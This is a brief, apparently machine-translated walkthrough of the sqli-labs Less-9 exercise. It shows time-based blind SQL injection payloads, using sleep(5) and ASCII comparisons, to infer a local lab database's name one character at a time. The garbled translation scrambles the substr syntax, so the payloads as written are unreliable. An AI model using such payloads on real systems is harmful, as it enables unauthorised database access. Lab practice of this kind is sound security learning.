Plus and
Http://localhost/sqli/Less-9/?id=1 ' and ' 1 ' = ' 1%23http://localhost/sqli/less-9/?id=1 ' and ' 1 ' = ' 2%23
The page did not change, a moment did not understand, read the next source
Discover that no matter what the result of the query, the display will not be different
Learn a function
Sleep (n) sleep n seconds
The result occurs after 5 seconds
As with LESS8, it is a blind hole that constructs the request
Hibernate 5s If the ASCII code of the first character of the database name is not equal to 114
Http://localhost/sqli/Less-9/?id=1 ' And if (ASCII (Database (), substr) =114, 0, Sleep (5))%23
The browser status bar displays
=115 without delay, you can speculate that the first character is ' s '
Http://localhost/sqli/Less-9/?id=1 ' And if (ASCII (Database (), substr) =115, 0, Sleep (5))%23
"Sqli-labs" LESS9 get-blind-time based. -Single Quotes (time-based get one-quote blind)